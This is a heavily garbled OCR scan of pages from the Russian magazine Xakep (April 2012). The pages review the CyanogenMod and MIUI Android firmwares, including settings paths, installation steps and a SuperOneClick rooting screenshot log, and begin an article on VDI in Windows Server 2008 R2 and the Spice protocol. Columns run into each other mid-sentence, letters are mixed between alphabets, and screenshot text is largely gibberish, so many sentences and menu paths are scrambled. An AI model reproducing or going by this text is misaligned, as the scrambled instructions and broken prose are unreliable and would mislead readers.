служил свою популярность? Ответов здесь два.

[эта функциональность появилась в СМ е щ е

Во-первых,

до ее анонса в Andгoid 2.2].

CyanogenMod

создан гиками и для

щью одного из множества Аndгоid-эксплойтов.

щью которого можно перезагрузи т ь телефон

Linux- SupeгOneCiick [goo.gi/H ibN ], которое можно запустить с помощью mono. Обе софтины

гиков, поэтому в его комплекте есть множество

Вс т роенный эквалайзер, который работает

используют распрос траненные дыры в Andгoid,

инструментов,полезныхпродвинутомуnоль­

в отношении всех при ложений.

а поэтому способны зарут ить множество различ­

зователю: например, встроенный SSH-cepвep,

Многочисленные оптимиза ции и доработки

ных устройств. Е сли не заработают, попробуй

интерфейс тюнин г а низкоуровневых параме­

в низкоуров н евой части ОС, включая пере ­

найти руков о дство для своего девай са в

тров ОС и полноценная консоль с

работанную библиотеку

Во-вторых, в разработке

Механизм строгих ограничен ий, п оз воляю­

гесоv егу. SupeгOneCiick делает это автомати­

щий зап ретитьт ем или иным приложениям

чески, для всего остального есть

bash и busybox . CyanogenMod при­

нимает участие большое количество независи­

google.

Далее необходимо установи т ь кастомный

Bionic.

Rom

Manageг,

мых разработчиков, каждый из которых может реализовать интересную идею и рассчитывать,

что его патч будет принят в основную базу кода. В результате в

CyanogenMod

r ~ SuperOneCiick

""'-

можно найти

множество очень оригинальных доработок, таких как интерфейс управления питанием

-

в выпада 'ющей панели, механизм принудитель­ ного ограничения приложений в возможностях,

встроенный эквалайзер и так далее. П люс ко всему

CyanogenMod

включает в себя большое

r.i!l.alng ВшуВох ~~)Aootng devк:e -Siept:1 Root.ngdevice - Siep.::-2

Поддержка /etc/init.d. В CyanogenMod, как и в

"""'"""""'' . Rootngdevк::e

можно создавать загрузочные скрипты

"""'""""""

samba или ftpd] и команд [для оптимизации управления памятью, например].

CyanogenMod есть собственный,

более прозрачный механизм установки при­

1

........

· Siep::З

Slep::4

Rootngdevice -Siep : 5 · Siep ::6 -Step ~7 Remcк.rtng / system v.'th read-v.rte а Cre.!:ng /q-stemh:Ьin .. lni!tь\ngsu VsystemJ'Jdln) .. · Step :: 1 nstallngsu VI)'Stemh:lжi) ... ·Siep r:2 lnsta:8'1gsu Vq·s:tern.hЬn) ... ·Siep .;:З N!aling$ц)efllser -Step.:t\ 01edong for Ьus:,tюx Remou-ulg /~r,-i!l.em wih read-oNy ее .

"""'""""~

для запуска сторонн ихдемонов [например,

памяти. В

""'-

kut!JngbyВox~~)

и чего нет в стандартном

Во зможность установки приложений на карту

""''"" St.anServer \VмforOevce

Get\юgrnarU<К't~.rer. ~VeniOn

Andгoid:

Linux,

Sl.ёl'trlgADBServer

\'.'aitf19lordevlc.e

a-.edmg t rooted ..

Вот далеко не полный список того, что

11

""'""' ADBCommм.d

""""""'""·

н о поднимают производительность аппарата.

CyanogenMod,

11

""'

~/ФBServer

количество оптимизаций, которые действитель­

есть в

=

@) . . . . . .

~(.,ptrv,м;'

Ge!Property GetPrwet!)• ChecklfRooted

""""' """"""""' """""""'

Т)-ре

т.,.

4.05s 0.04s

0.02s 0.02s 0.03s 0.035

077• 002:5 озъ

""""'

ChangeМod~

О.ОЪ

"""""""'

0.02s

ShOIComмod

30.921

\\'мForOevce

0.035 0. 12s 0.02s 0.12s

ShoiComm""'

'""'"'

"""""""" Chan9eiJ.ode

11

......

Remcм.rtng

"dмmonnatn.nW'Ig

startnglnowonpon 5

О.ЗЗs

0.021 1.1~

/ S)'1tem wlh !Ud..,..ТIIe acceu ...

Cre&ng /S)'$1.emh±мn

mkdrfoi&d for /S)'5tem/:Фn . Aeex~!ll.s OK0.02s

MBSSO

lnstalrngsu VsystemlxЬi'!) ...

I:Ю195i9%

·Step ;:l

SIOKВ/s(2&264Ь)tesn00421)

т~

OK012s

1417KB/ s { 1002SS2Ьr!es't1 O.i32s)

tutlllf1gsu Vsystem.IJ!Ьn).

- Siep :;-2

OK002s 1095KB/s ( 16SЗOЬ;1es r.00 15s)

mtlko9 su Vqostemhton)

·Step::З

OK002s П Gngeroreak/Нone•I'ЬolnЬ

-

мclrcмd

ок rri<d.-failedf« /systernhtиn . Filee;oosts 610KВ/s(2Б264b:,tes n O .a:2s)

2.[2.31

Nt4ing Sц>«User ·- . Slep =1 834 КВ/s (1S&521 bytetin0230s) ОКО.ЗЗs

Ch!к:Ь-ogfor~

OK0.02s

0.02s

PushFМe

·1

ок

О.ОЪ

ShoiComm"" lo\ol.ni:S:,ostem

"""'

1"'-..."'

OK012s

О. ОЗ.

O.Oh

....

о,

L\>do<•Chod<

1.0&

ShoiComm""'

Мoi..RS,-stem

11 -~m:)~ ll

""""'

834КВ/s(1S&521Ь;-tes n0 230s)

Rernotning /sysem v.ih reM-cnly access ок

ок

OK1 .16s

ложений на ехt2-разде л карты памяти .

Пр о шивка включает в себя

bash, busybox

Рутинг с мартфона с nомощью

SuperOn eCiick

ХАКЕР

112

www.epidemz.net

04/ 159/20 12


Битвы зеле ных роботов

который можно уста н овить прямо через Марк ет

lgoo.gi/W8dJK]. Запустив его, выбираем пункт «Fiash ClockworkMod Recovery>>. Дале е за­ кидываем на карту памяти прошивку [ее можно

Д ля полной выгрузки пр иложения из памяти

Чтобыпереключатьмузыкальныекомnо зи­

можноиспользоватьдолгое нажатиена

ции долгим нажатием кноnки у правления

кнопку <<Назад>>. Н о функцию необходимо

громкостью,активируйда ннуюопцию:М еnu

активировать в настройках: М епu

-7 Settings -7

-7 Settiпgs -7 Applicatioп Settiпgs -7 Developm e пt -7 Stop

Cyaпogen M od Settiпgs -71пp ut

-7

получ ить з д есь: cyaпogenmod .com/devices l и приложения Google lgoo.gl/60chT ]. Вновь воз ­

арр via loпg-pгess.

Му зыкальный прои г ры ватель также п оддер­

вращаемся в

СуапоgепМоd поддерживаетжесты на экране

живаетуnравление жестами: Пл еер

блокировкидлявыполнения различных

-7 Music Settiпgs -7

Rom

Мапаgег и перезагр ужаемс я

в консоль восст-еновления, нажав

<< Reboot into

-7

М е пu

ЕпаЫе gestuгes.

функций или запуска прилож ений. Активация

Чтобы запретитьприложениям выполнять те или

ния [или <<инженерном меню>>, как его любят на­

и управление в настройках: Мепu

иныедействия [наnрим ер, отправкуСМС или чте­

з ывать студенты технических вузов], нажимаем

-7

клави шу уменьшения громкости до тех пор, пока

L ockscгeeп gestuгes.

не дойдем до пункта <<Wi pe data/factoгy гeset >>,

Цвет и п оведен ие LЕD-индикатора можно

вхо дим в меню кнопкой включения, выбираем

изменить: М епu

<<Yes>>. Возвращаемся на уровень выше, выбира­ е м << lnstall zip fгom sdcaгd>>, выбираем прошивку, снова нажимаем <<Yes>>. Таким же образом про ­ шиваем прилож ения Google. В конце возвраща­ емс я в корень меню и выбираем «Reboot system

Settiпgs

В отличие от Aпdгoid, СуапоgепМоd способен

Для устройствснеудобной или сломанной

устанавливать на карту памяти любые прило­

клавишей включения можно настроить вклю­

жения, вне зависимости оттого, хотят о н и это­

чение экрана с помощью клавиши << М еню>>:

го или нет. Полезная функция для владельцев

ПОW>>.

смартфонов с ограниченным объемом памяти,

Menu -7 Settiпgs -7 CyanogenMod settings -7 Lo ckscree n -7 Unlock options -7 М епu unlock.

Recovery>>.

Оказавшись в консоли восстановле­

Volume buttoп music contгols.

ИСПОЛЬЗОВАНИЕ

СуапоgепМоd Sett iп gs

-7

-7

Settiпgs

L ockscгeeп

-7

ни есписка контактов], открой менюуправления

-7

Приложе ни ями [Menu -7 Settings -7 Applications -7

-7 Settiпgs-7

Maпag eApplicatioп], выбери нужную программу и в

разделе Peгmissionsтaпни поте м в~зможностям,

СуапоgепМоd

lпteгface > LED пotificatioпs.

которые ты хотел бы отключить .

но опасная, так как не все приложения будут

Чтобы в списке запущенных приложений,

р аботать корректно: Мепu

доступном черездолгое нажатие клавиши

-7 Settiпgs -7

В этом разделе мы поговорим о возможностях

СуапоgепМоd Settiпgs -7 Applicatioп Settiпgs

прошивки . Их много, и почти все- скрыты

lпstalllocatioп.

изме ни значение с nомощью настроек:

в по ль зовательских настройках. Мы остановим­

СуапоgепМоd умеет автоматически об­

-7 Cyanoge nM od setti ng s -7 1nput -7 Long pгess home sett i пgs -7 Nu mbeг of гесепt apps.

ся на наиболее интересных и полезных.

новляться.Дляэтогоактивируйсоотве~ ствующий механизм: Мепu

Переключатели в выпадающей па н ели. Очень удобн ая вещь, которая перекочевала в

-7 Settings -7 CyanogenMod Settings -7 System -7 Update

MIUI.

переключателей можно изме н ить в настрой ­

Для показа заряда батареи в nроцентах

ках: Мепu

включи следующую опцию: Menu -7 Settings -7 CyanogenMod Settiпgs -7 Status Ьаг tweaks -7 BatteгyStatusStyle -7 Р егсепtаgе.

Widget Buttoпs.

Н

Личные

olll

Система

~ G

-7

Ш 0

19:54

Программы

Н

Личные

Для повышения скорости загрузки отключи

Menu -7 Cyanoge nMod settiпgs -7 DisaЫe boot animation. Там же стоит включитьопцию <<Lock home in

пotificatioпs.

-7 Settiпgs -7 СуапоgепМоd Settiпgs -71пt егfасе -7 Notifi catioп PoweгWidget -7

olll

Система

~ G

Menu

ееанимацию:

По умолчанию их четыре, но количество и су ть

~ 0

<<Домой>>, видеть более восьми приложений ,

-7

19:54

P eгfoгmance

memoгy>>, чтобы заnретить выгрузку рабочего стола из памяти и избежатьсвязанных с этим лагов.

rn 0 ....

Программы

Н

Личные

Система

olll

~ G

19:54

Программы

1

л

~ Звук

Режим полета

Экран

(

'·

Устано вка и разработка ПО

00

Менеджер п риложений

НЕТ

Мобильная се ть

>

Настройки

Wi-Fi

>

Н астройки

Bluetooth

Вызовы

@

LЕD- ll\ндикатор

SMS/MMS

(!j Темы оформления

~

Gmail

;._"j

Обои

Настройки прокси

Google Talk •

Рабочий СТ ОЛ

>

Размер шрифта

>

На стройки

VPN ~ Браузер

.::.

Режим модема

ЬJ

Переключатели

Календарь

>

1-МЬ

Дат а и время

Ок но настроек

ХАКЕР

MIUI

113

04/159/ 2012

www.epidemz.net


UNIXOID

MIUI с темой Samsung Galaxy 5

Основной козырь

Для снятия скриншота на жми кнопку вклю­

MIUI- эт о

интеграция

3.

компонентов системы друг с др у гом и общая за­

чения и тап ни по пункту «Scгeenshot», он

Встроенная защита от вред о носного ПО. В от­ личие oтCy a no g e nMod, в котором ограниче­

будет сохранен на 50-карте, в каталоге DCIM/

конченность ОС. В отличие от других прошивок,

ния приложений на выполнение каких-либ о

Scгeenshots.

она не выглядит недоработанной, здесь все

опасныхдействий приходитсяустанавливать

подчинено общей идее и работает на удивление

вручную,

DSPManageг, позволяющее управлять на­

слаженно. Например, если ты читаешь на сайте

пыткеприложениявыполнитьтакоедействие

стройками эквалайзера по отдельности для

разработчиков о поддержк е тем, то можешь

и предлагает ему выбор « запретить /разр е ­

различных устройств вывода звука !наушни­

быть уверен, что это не просто изменение цвета

шить>>. Так, например, если какая-либо про­

ки, динамик].

и внешнего облика графиче с ких элементов,

грамма попытается отправить СМ(, на экране

В состав

CyanogenMod

включено приложение

появится соответствующее сообщение.

а полная модификация всех графических со­

MIUI. ANDROID ПО-КИТАЙСКИ

ставляющих прошивки, начиная от анимации

MIUI уведомляет пользователя о по­

4.

Встроенный м о нитор сетевого трафика.

Теперь поговорим о дру г ой прошивке со стран­

загрузки и заканчивая внешним видом строки

Дей с твительноудобное приложение для про­

ным названием М IUI!произносится как «Ме

состояния. И да, конечно ж е ты получишь в рас­

смотрастатистикииспользованияинтернета

1»1. В отличие от CyanogenMod, развивае­

поряжение менеджер тем , п о зволяющий искать,

по дням и неделям с возможностью установки

мой сообществом на добровольных началах,

просматривать и устанавливать новые темы, ко­

лимита, а также полезной функцией авто­

за разработку

торые будут автоматически з акачаны с сервера

отключения ЗG nри отсутствии активности.

You

MIUI

отвечает вполне реальная

китайская компания Xiaomi Tech lxiaom1.coml,

проекта. То же самое можн о с казать и о любом

В качестве бонуса доступен встроенный

бизнес которой строится на разработке мобиль­

др у гом элементе ОС, включая стандартные при­

брандмауэр, позволяющий отключать интер­

ных приложений для операционных систем

ложения для доз во на и отправки СМС. Трудно

и Аndгоid.Запущенная в

2010

iOS

году, компания

описать все это по пункта м, поэтому я ограни­

нет для отдельно взятых приложений.

5.

Встроенный файервол для блокирования

изначально специализировалась только на

чусь своеобразным хит-парадом возможностей

звонков и СМС-сообщений от особо назой­

разработке стека приложений для Andгoid,

МI Щ которых нет ни в

ливых.Вполнестандартный,ноотлично

включающего в себя музыкальный плеер, гале­

более, в стандартном Andгoid:

рею, камеру, номеронабиратель и п риложение

1.

для работы с контактами. П озднее

CyanogenMod,

ни, тем

приложений, половина из которых вообще не работает.

По большому счету, ничем не лучше и не

Xiaomi Tech

объединила этот набор с нарабо т ками проекта

хуже DialeгOne, но о н включен в комплект ОС

CyanogenMod и начала работу над новой про­

и полностью подчиняется менеджерутем.

шивкой с полностью переработанным внешним

функционирующий, в отличие от сторонних

Номеронабиратель с поддержкой Т9-поиска .

2.

6.

Встроенная программа для бэкапа прило­

жений и настроек !с возможностью хранения в облаке].

Простоеистильноеприложениедляработы

Регулярные ОТ А-обновления раз в неделю.

обликом, поддержкой тем, собственным домаш­

с СМС, которым дейс т вительно удобно поль­

ним экраном и многими другими новшествами.

зоваться. П риложение уведомляет одаставке

Каждую пятницу с мартфон будет предлагать

В результате получилась стильная и неверо­

СМС адресату, выводиттекст пришедшей СМС

установить новую версию прошивки в полно­

ятно удобная в использовании операционная

прямо на экран, предоставляя возможность

система, которая к текущему моменту не менее

быстрого ответа, и тоже подчиняется установ­

известна, чем

ленной теме.

Cyanogen Mod.

7.

стью автоматическом режиме.

8.

Синхронизация с облаком.

MIUI умеет

синхронизироватьприложения,настройки,

ХАКЕР

www.epidemz.net

04 / 159/2012


Битвы зе л е ны х р обо т ов

Официальные

аппараты

Google, Google Nexus Опе , Google Nexus 5 и Samsuпg Galaxy Ne xus,

такие как

и з начально имеют

rооt-дост у п .

• Название MIUI состоит из дву х

ч асте й :

значит

Ml, которая

Moblle

lпterпet !или, как это ни странно ,

Missioп lmpossiЫel , и

Ul- User

lпterface .

Таким образом в с ово ку пности название можно перевести как

<< интерф ей с для мобильного интернета » .

MIUI со стандартной темой

9.

контакты, бзкапы и прочее с собственн ы м

iiilf.illel:lk!j

облачны м сервисом.

Установка

Возможность изменения разме р а ш р иф т а

стью аналогична установке Суапоgеп М оd,

падающем ме н ю откроетокно настройки

сразу для всех приложений. Одна из тех

за исклю ч ением тог о, что приложе ния

соответствующей опции.

функций, которой так не хватае т в стан­

Goog le,

дартном Andгoid.

входят в комплект прошивки, и их не нужн о

10. Менеджер запущенных приложений с воз­

MIU I

окно голосового nоиска.

насмартфон почти полно­

такие как Мар кет и

уже

Gmail,

4.

что в оригинале

MIUI

азиатские языки, так что придетс я восполь­

разработчиков

зоваться одной из неофициал ь ных сборок,

MIU I

в слишком большой

похожести прошивки на

iOS,

операционную

ситься.

MIUI

просто пропитана духом

iOS,

он здесь везде: в меню, иконках, каждая из

горизонтальной линии.

6.

проигрывателю .

Те, кто п редпочитает использоват ь англо­

7.

в nроцентах [Settiпgs -? System

с сайта miuiaпdгo1d . com [смотрим раздел

Notification Jпdicatoг Style -7 P eгceпtagel.

ROMsl. Всем остальным- добро пожаловать m 1u1 .su , автор

В.

на русскоязычный ресурс

других элементах. Д аже стандартный до­

которого самостоятельно переводит каждую

9.

машний экран выполнен в стиле

новую прошивкуна великий и могучий.

iOS:

меню

Система умеет отображать з а р я д батаре и

язычные версии ОС, могут с качать прошивку

шенными углами, цветовой схеме и многих

которых обрамляется в квадрат со ско­

Дважды нажми на часы на экране блоки­ ровки, чтобы получитьдосту п к медиа ­

перев еденных на другой язык.

с истему iPhoпe, и с ними труд но не согла­

Для удаления сообщения в СМ С­ приложении быстро проведи пальцем по

поддерживает только

дегтя. Многие пользователи упрекаю т

Для снятия скриншота одновременно на ж ­

громкости.

5.

отнестись с осторожно стью. Дело в том, К сожалению, не обошлось и без ложки

Долгое нажатие на переключатель в вы­

ми кно пку<<Меню» и клавишууменьшения

до устана вливать отдельно. В то же время к выбору источника для скачива ния следует

можностью выгрузки из памяти.

3.

приложений в нем нет, все установленные

-7

Batteгy

-7

Наж ав кнопку << ДомоЙ >> на экране блоки­ ровки, ты включишь фонарик. На экране блокировки тап ни два раза по значку СМ С. чтобы прочитать последнее

Также нужно быть очень внимательным

сообщен ие.

программы сразу попадают на рабочий

в выборе версии. Здесь все крайне запутано:

стол, при заполнении которого создается

например, текущая стабильная версия имеет

рабочий стол выбери и удерживай иконку

новый, а затем- еще один, и так далее. Так

номер

одним пальцем, а другим- проматывай

что, установив сотню программ, ты будешь

бета-версия-

тратить время в основном на то, чтобы про­

2.3.7,

в то время как разрабатываемая

2.1.20, а порт на основе ICS [Andгoid 4.01- 2.1.13. В общем, смотри в оба.

кручивать рабочие столы в поисках нужной

софт ины [справедливости ради стоит ска­

10. Для

ИСПОЛЬЗОВАНИЕ

перемещения иконки на другой

рабочие столы.

I:I§I:I•J!tl Д ля мно г их пользователей Суапоgеп М оd

зать, что установить альтернативный лончер

Ничего сложного в общении с

система все-таки позволяет!.

ржавого чайника нет. Главное- запомнить,

нежели стоковые прошивки смартфонов

Второй нед оста ток

состоит в ори­

MIUI

даже для

и

MIUI

могут стать гораздо лучшим выбором,

что здесь отсутствует меню, и все приложен и я

с собственными наработками компаний.

е нтированности на рядового nользователя.

будут установлены прямо на рабочий стол. Тем

И они превращаются просто в спасение, когда

Здесь нет ни продвинутых нас т роек, ни

не менее, есть несколько моментов, знание

производитель намеренно отказ ы вается от

в комплекте, ни, тем более, под д ержки уста­

которых сильно упрощает жизнь. Итак, хит­

обновления своего аппарата д о новых версий

новки приложений на ехt2-раздел. Красиво,

парад скрытых возможностей

операционной системы. В мире открытых

яр ко, удобно, но слишком скучно для тех, кто

1.

MIUI

ssh

любит поковырять ОС и общается с зеленым роботом на ты.

ХАКЕР

2.

MIUI.

Для отключения звука звонка просто по­

исходных кодов всегда найдется разработ­

ложи с мартфон экраном вниз.

чик, готовый выполнить порт или добавить

Д олгое нажатие на кноnку поиска откроет

функцию, которой так не хватало. ::Х::

04/159/2012

115

www.epidemz.net


SYN/ACK

Сергей Яремчук [gгindeгlasynack.гul, Евгений Зоб нин ljlmlasynack . гul

терминальных систем РАЗВОРАЧИВАЕМ ИНФРАСТРУКТУРУ VDI НА WIN2K8R2 И LINUX

С ростом размера сети типичная среда, включающая ОС, приложения и данные, разбросанные на множестве компов, становится громоздкой для управления, а пользователи ока з ываются привязаны к своему рабочему месту. Было предложено несколько те х нологий, призванных решить данную проблему- терминальные серверы с централизованным хранением данных , переносимые

профили, виртуали з ация ОС. Но в итоге пришли к логическому финалу- виртуали з ации рабочего стола.

ХАКЕР

116

www.epidemz.net

04/159/2012


Н овая эра те р м ин а льны х с и с т е м

...W.!!

__

,

:

IJ

--

~"".:.""-"':="""21

~

Выбор служб ролеК

1

~~-j=. ...... ~

-~ ~УА-~tт.

~ :::~_:._--:.=-=

•=ы

'"'"~-~~=-;::-"":::m!I:::::!!81--E "":"~'"~ !0'."",.,~-

~ --

J -

- =~~~ ~~~~ ~.

. .-

C tkeo-y-~n­

c ~-noA~~,,-~('!0/IY

C W~>o•r•--~n­

~CIIJ'dr-~~тo-

06.wooo

"'~Oclourl­ 'll,o-..c.c.o.>.

--o~PI6c>olroC1VIII

--

=:::.:..""';~.:-- оа-

J. Guaт

~ -IQ"n_fll)

!

.I Щ.,..SIASS

---

." .~0.00

. ~ ""'....__.........

1

. '"" _ _

__

,_~

............

:_F--::::-==-

:.J,sa--'dl*l

8"'P'YaJIIOfJIUIII yдn~~oн~WII: рnбочиж С'ПU>ОВ~

~·....-У»а

,

'='~~----~~" · --­

II006.aAioiМЫQ Д/101 O<DН.-oot< ПI '"У:моn

....... ... ....,.,__

~-~..._

,__..,..,.._,C'fOIIJ

...

'!l,c--.U:oon

-i'."-"*'rC

pone 'l,

cь--C:ON•

. -"' __ __ 1

~.,..:::~.::--=~ -....,_ ..

i

"".~Corm

" -~

Добе8011 1о cny.a&,.o

~----po&o..\ctall

от_...,.,.,__,..,._бr..,т~--••

itl oa.-..Guts~r

~-

1"_ IYwN•- 1~ 1Т•-1

гь--·-~~~-

,l,Or'IЦIIЯW'ro

Lм......,..,..~r----o-

.!J.!!J

Чl*<ffl!n"l] e.a.--Jer.eм ]с.-] у_.".__

~ ...,.".".

1

"~-·-

~~

""""-

~~

_

1 n,;"""ymr6mpJmgrgsfetpo/!ll?

Роль у з ла виртуа л иза ции рабочи х столов требует наличия

Н астройка личного виртуа льн ого рабочего стола в << Свойства х н nользователя

Hyper-V

НАСТРОЙКА VDI В WIN2K8R2

AD

з ователь закончил работ у, виртуальная машина останавливается

Наиболее интересные возможности служба Teгminal Seгvices по­

и б ольше не расходует ресурсы сервера, хотя при следующем об­

лучила с выходом

ращ е нии требуется некоторое время на ее запуск.

Win2k8R2,

причем чтобы nодчеркнуть значимые

изменения в функциях, она была переименована в

Информация о переональном рабочем столе, назначенном пользова ­

Remote Desktop Se г vices [RDSI . В частности, благодаря реализации технологии VDI [Viгtual Desktop lnfгast г uctuгel Win2k8R2 теnерь может являться частью инфраструктуры DaaS [Desk top as а Seгvicel. Новая роль RD Viгtualization Host п редставляет собой сервер с ролью Нурег-V с nодготовленными VM, достуn к которым реализуется традици­ онными средствами RDS по nротоколу RDP. П ользователь вмес т о

те лю , хранится в AD [при функциональном уровне домена Win2k8R2/, посмотреть и скорректировать ее можно в свойствах учетной записи

I<< Active Diгectory ·>Пользователи и компьютеры>>/, во вкладке «Лич­ ный виртуальный рабочий стол» [Peгsonal Viгtual Desktop/. В VDI соединении участвуют все комnоненты RDS: RD Web Access - страница входа, предназначенная для подклю·

доступа к отдельному приложению получает полноценное [хотя

чения , выдается список достуnных виртуальных рабочих столов

и виртуальное/ рабочее место, которое настраивает полностью по

и приложений;

своему вкусу и в соответствии со своими задачами. Подключаться

RD Gateway -

к своему рабочему столу он может nрактически с любого устрой­

вне корпоративной сети;

ства, интегрированного в сеть - тонкого клиента , ноутбука , ПК или

RD Connection

с мартфона. Системные требования к клиентскому ПК минимальные.

пользуется для балансировки нагрузки, отслеживает и восста­

Внешне TS/RDS от VDI для пользователя мало чем отличается,

обеспечивает доступ пользователей, находящихся

Вгоkег -управление подключениями к VM, ис­

навливаетсоеди н ения;

ресурсы, чтобы восстановить работоспособность, nонадобится пара

Remote Desktop Session Host [RDS HI - основная роль, обеспечи­ вающая подключение к удаленному рабочему столу и RemoteApp; RD V i гtualization Host [RDV Н /-обеспечивает функциональность VDI, требует наличия роли Hyper-V [если таковой нет, она будет

минут, упрощено хранение данных, обновление и распределение

автоматически предложена мастером установки/;

но переход к последнему имеет ряд плюсов- каждый получает

переанальный набор ОС и приложений, сбои и вирусы не окажут влияния на другие системы. Ад м инистратор четко устанавливает

хранилищелицензий

лицензий ПО. Нужен новый рабочий стол- пожалуйста: одно дви­

RD Licensing -

жение мышкой, и пользова т ель уже может работать.

дней возможна работа в тестовом режиме.

RDS CALs,

в течение

120

Виртуальные рабочие столы могут быть: Peгsonal Viгtual

Desktops- nереанальным и,

когда каждый

Сам процесс подключения к

VD I nрозрачен, nользователь выби· VD I в RD Web Access или запускает подготов­

nользователь получает ин д ивидуальный образ ОС с полным до­

рае т назначенный ему

стуnом, может настраивать рабочую среду по своему усмотрению,

ленный

пользовательские дан н ые хра н я т ся в самом

на основе его nрав в домене.

Viгtual

VD;

Machine Рооl -общий с унифицированными настройками VDI, пользователь, запрашивая доступ к пулу,

RDP

файл, все остальное будет выполнено автоматически

Все настройки ролей производятся в соответствующих консолях:

и Приложениями

« Диспетчер Нурег-V», «Конфигурация узла сеансов

RD P»,

« Д исnет-

по л учает л юбой с в ободный д есктоn, по окончании р аботы все

дан н ые и настр о йк и в об р азе не сохра н яются. П ереанал ь ный и общий

VD соз д аются

из заранее по д готов­

ленных администратором н аборов образов и отли ч аются лишь на­ значением и возможностью сохранения изменений. Общий рабочий

стол удобен, когда требуется временный доступ [например, при

обучении, семинарах/, или ко гда д анные хранятся централизован· но, а для их обработки используются специфические приложения, не требующие nодстройки на клиентской стороне. Если сеанс не заканчивается, а просто производится отключение от общего

VD,

то все данные сохраняются, и nользователь может в любой момент

вернуться к работе. Еще один важный момент: как только поль-

ХАКЕР

С

VDI

ПОЛЬЗОВАТЕЛЬ ПОЛУЧАЕТ

ВИРТУАЛЬНОЕ РАБОЧЕЕ МЕСТО, КОТОРОЕ НАСТРАИВАЕТ ПО СВОЕМУ ВКУСУ И В СООТВЕТСТВИИ СО СВОИМИ ЗАДАЧАМИ

04/159/2012

117

www.epidemz.net


SYN/ACK

чер подключений к удаленным рабочим столам>> и других. В частно­ сти, в << Д испетчере подключений ... >> после стандартной настройки

ролей Нурег -V и

RDS

[JLJ;=;LITY У

1 а 1 U R L D! 5I 111

Р

следует подключить сервер узла виртуализа­

'"'"'"

ции [Add RD Viгtualizatioп Host Seгveгl и запустить <<Мастер на с трой­ ки виртуальных рабочих столов>> [Configuгe Viгtual Desktops Wizaгdl, который поможет добавить в список все узлы с Нурег - V, с ерв ер Conпectioп Вгоkег и

RD Web Access.

RD

AD

или запустив мастер назначения в ир т у ­

ального рабочего стола [Assigп Peгsonal Viгtual Desktopl. Пул VD также создается в

.. Machiпe

Pool

RD

Coппection Вгоkег при помощи мастера V iг t u a l

Cгeation Wizaгd, который запроси т два парамет р а­

имя пула и имя

RD

Connectioп Вгоkег. В настройках всех серви со в

помогает анализатор соответствия рекомендациям [BPAI.

Когда

UNIX

Swrch

Теперь осталось лишь на з н ач ить

пользователям виртуальный десктоп. Это можно продела т 11 в с в ой ­ ствах учетной записи

Virtu a l m a chi nes

' "_

о о о о

.. •'

о

[ start

'

Ust r

'

Ols klmev e

~

S 1a1 1

Bt o cko:d

ru n niГIQ

UnЬiock

Block

"""

В е б-ин те рф е й с

перешел из эпохи текстовой консоли в эпоху графич ес ки х

'

s•ntl

' "'

-

runnlnq

runnlrWJ

~' o r

OVD Web Administration Tool

деокарты, что позволяет ему применять множество различных техник

интерфейсов, вопрос о связи терминалов и серверов , казалось , б ы л

оптимизации передачи тяжелых данных, включая сжатие изображе­

решен. Графическая подсистема

ний, видеопотоков, интеллектуальное распределение нагрузки между

UNIX

была разработана с целью обе­

спечения сетевого доступа к удаленному дисплею и позволяла сде­

клиентом и сервером, синхронизация видео - и аудиоданных. Являясь

лать это легко и без лишних хлопот. Админ просто авторизировал воз­

пр отоколом достуnа к виртуальным машинам,

можных пользователей и запускал на терминалах Х-сервер, который

де л ять для различных групп пользователей виртуальные машины,

принимал запросы на отрисовку графики от приложений, работающи х

раб от ающие под управлением различных ОС. В целях безопасности

на мэйнфрейме. Простая и понятная схема, превосходно работаю-

к ажд о м у пользователю можно выделить собс т венную виртуальную

Spice

позволяет вы­

щая в 80 - х. Сегодня д оступ к удаленному рабочему столу с помощью

м ашин у. В общем и целом инфраструктура сети тонких клиентов, по­

Х-протокола просто бессмысленен. Современные приложения уже не

строенная с использованием

испол ь зуют простые и легковесные команды для отрисовки своего ин­

ПК, снабженных простым Sрiсе-клиентом, и мэйнфрейма/кластера, на

терфейса, а работают с графическими буферами, постоянно посылая

к отором крутятся виртуальные машины с поддержкой Spice - cepвepa

Х-серверу команды по их отрисовке и обновлению. Это очень мощный

[п о одной на каждого клиента или же на группу пользователей!.

и тяжелый поток данных, с ко торым едва справляются современные

Компания

каналы связи. В и д ео при таком способе обмена данными, например,

по старалась, чтобы интегрировать под д ержку протокола во все воз ­

смотреть уже невозможно. О д ним из способов решения этой проблемы

мо жные средства управления виртуальными машинами. Сегодня

является перехо д на более со в ременные, интеллектуальные про­

в с т роен в

токолы доступа к удален н ому рабочему столу.

а л ьн ыми

примеров такого протокола. По су т и

Spice

Spice- один

из лучших

является механизмом дост у ­

Spice, будет

выглядеть как набор простых

Red Hat, купившая разработчиков Spice в 2009 году, хорошо

Spice OEMU, библиотеку l ib vi гt и инструменты управления вирту ­ машинами типа v i г t -maпageг и viгsh. П сеададрайвер Spice,

поз в о ляющий выжать из протокола все, уже доступен для Х-сервера,

па к уд аленным виртуальным машинам, позволяющий пробрасывать

а в качестве клиентов доступны простой

по сети не только изображение рабочего стола, но и многое другое,

Win dow,

включая устройства ввода, USВ - порты и аудиопоток. Передача этих

с ких клиентов на основе библиотек GТК и

данных осуществляется настолько эффективно, что даже на не самом

высокоскоростном соединении пользователь может свободно поль­

spicec,

работающий поверх Х

специальный плагин для Fiгefox, а также несколько графиче­

Ot.

Фактически, все что нужн о сделать для запуска простейшей

Sрiсе - с ети- это выполнить две простые команды:

зоваться всеми услугами современных графических сред, смотреть

видео, проелушивать музыку и, в общем-то, делать все, что угодно [н е

1.

На с тороне сервера:

удастся, пожалуй, разве что играть в современные игры!. Сервер Spice встроен в виртуальную машину и работает на уровне виртуально й в и-

$ sudo apt-get i nst al l qemu-kvm

"~

Настройка nараметров nеренаnравления д/111 ~0C'Т~JC/Иtti1., JI OCТJf\800:11М111Y.,..._ I)aбoo.& .,cтon.oтl)e5 yeтaceQIIOtO

YJ/\ot C~/IНC08'fii~~CТ0/108,paбaт/IIOIWМ IJ ~~.

!

~:::::z.:=~CТO/IOIIIOpeol-~j'Je

~oбwoбo.~г.ep~np•r.'lf""fi\IS'.v<ТO&, IOCI"IO..-:IV-ПOJ:Itr.80'o~t~ YlllllflН>мy p.W~t>!Y

("JOI"f

~~11ом6. ! ~лм6or.tt p...,.ti, eeptw~ ~-о yu~n.

r!f/JtiШNM\I!IШ><tQOCQI

1 C.epDeJI\'31'i&U:IIНC08yJI;-po6oo....ruOI'CII6YAn"'"0Nтжeo<М~till ~. Euo<<tiii'ТONT жeo<611><К1pg;.ц,apeep6\'}NI !Ч ~~toe

